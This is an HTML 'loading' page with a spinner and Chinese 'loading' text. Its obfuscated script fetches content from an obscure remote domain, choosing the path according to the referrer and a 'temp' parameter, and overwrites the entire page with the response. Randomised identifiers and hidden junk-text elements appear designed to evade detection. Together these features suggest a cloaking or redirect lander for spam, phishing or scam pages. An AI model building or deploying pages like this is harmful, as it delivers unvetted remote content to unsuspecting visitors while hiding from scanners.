<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .dnnWPo {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .dnnWPo .F9ITcwfHYF {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .dnnWPo .content {
            line-height: 50px;
            text-align: center
        }

        .dnnWPo .img {
            width: 100%
        }

        .dnnWPo .JUXHmK5E7B {
            text-align: center
        }

        .dnnWPo .JUXHmK5E7B span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .dnnWPo .JUXHmK5E7B span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .dnnWPo .JUXHmK5E7B span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .dnnWPo .JUXHmK5E7B span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .dnnWPo .JUXHmK5E7B span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .dnnWPo .JUXHmK5E7B span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .dnnWPo .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function fCUww8SJi96Nj(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var dcqpG = fCUww8SJi96Nj('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ dcqpG +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ dcqpG +".html?a=share";
		}
		
        fln62MR0=url+"#"+new Date().getTime();
        fln62MR0 && function() {
            $.get(fln62MR0, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >N5ap3id7cTpviPKBqkessLIMxendgZgWtacXdotygIwTcxiS83do9SEX9XAcSTX9Mc6lUyaCLbYQSf</li>
<h1 style='display:none' >UmwXVgqGeKMJVClGOmexQEYSieLmSt56RY5w6eqlf6EjRCAhAhXxQW3pQBfNc61QqAtdjsKeV03fImZdZqNg1</h1>
<b style='display:none' >PJqylGMyG33oMEM1lZJWA3ihcUyQwhZvv7xpmzIn64JOZS5Ra7BYBwPhDiSYaz3BAyUK</b><div class="dnnWPo">
    <div class="F9ITcwfHYF">
        <div class="JUXHmK5E7B">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<span style='display:none'>Kuyo5h8n4aR8Qem680xWq0qD626owApAt43c976EKCn9jgwkNfcEfTbAXKpL2LkjeF</span>
<h1 style='display:none' >gVpUNRl1qKlCnRHWQhelbgvdRBoLQRxXqpe0l3ewIhZ19Nk57ZxxWRUx8ZrxHLwof8JK</h1>
<ul style='display:none' >GRUai0dn85DquL8bVGUbdZggeorgH77Ck679U3j61eQdmj6ljvhojFbjqum8wiZjF6jUGnJFsVvi0ZIlfVP9lAV1fikK6oV8axN</ul>
<a  href='#' style='display:none'>YVLz1mrW4UX3VLtSZqHpkwz8lLTM6DLmKUJVGdZkEieyEk2cF1tdcgxrFck634GcU3nl</a></body>
</html>